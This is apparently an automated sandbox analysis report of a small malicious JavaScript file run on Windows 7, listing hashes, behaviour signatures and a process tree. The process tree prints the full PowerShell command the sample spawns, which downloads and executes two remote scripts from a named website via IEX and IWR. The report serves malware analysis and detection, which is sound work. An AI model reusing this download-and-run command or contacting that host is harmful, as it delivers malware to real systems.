Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
06-06-2024 14:07
Static task
static1
Behavioral task
behavioral1
Sample
9e1c9678aa1a203879ea5e93fd18f2831f6168ebf2d1f62680091bc21fc4217c.js
Resource
win7-20240221-en
6 signatures
150 seconds
General
-
Target
9e1c9678aa1a203879ea5e93fd18f2831f6168ebf2d1f62680091bc21fc4217c.js
-
Size
1KB
-
MD5
e2e9bf7a7dcfe1d55a43229add47520b
-
SHA1
f668de5e1e1090b831a6e8d8f08a9107234ab77f
-
SHA256
9e1c9678aa1a203879ea5e93fd18f2831f6168ebf2d1f62680091bc21fc4217c
-
SHA512
97eee0d2c2c71e53418323511599dc4a94f82633dff83b153a271eaa24b918a6c53544b20f51d3de4b2c5a4f0b442eb1edbb2706c9591463c1982f44e580deec
Score
3/10
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2604 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2604 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
wscript.exedescription pid process target process PID 2188 wrote to memory of 2604 2188 wscript.exe powershell.exe PID 2188 wrote to memory of 2604 2188 wscript.exe powershell.exe PID 2188 wrote to memory of 2604 2188 wscript.exe powershell.exe PID 2188 wrote to memory of 2604 2188 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\9e1c9678aa1a203879ea5e93fd18f2831f6168ebf2d1f62680091bc21fc4217c.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$env:paths = '7zNMB3GWTLNX'; IEX(IWR -UseBasicParsing 'https://www.dsestimation.com/wp-content/uploads/2015/10/piemagLI2X6.ps1'); $vv.SetValue($null, $true); IEX(IWR -UseBasicParsing 'https://www.dsestimation.com/wp-content/uploads/2015/10/noncontrabandsVB1.ps1')"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2604-3-0x0000000073BD1000-0x0000000073BD2000-memory.dmpFilesize
4KB
-
memory/2604-4-0x0000000073BD0000-0x000000007417B000-memory.dmpFilesize
5.7MB
-
memory/2604-5-0x0000000073BD0000-0x000000007417B000-memory.dmpFilesize
5.7MB
-
memory/2604-7-0x0000000073BD0000-0x000000007417B000-memory.dmpFilesize
5.7MB
-
memory/2604-6-0x0000000073BD0000-0x000000007417B000-memory.dmpFilesize
5.7MB
-
memory/2604-8-0x0000000073BD0000-0x000000007417B000-memory.dmpFilesize
5.7MB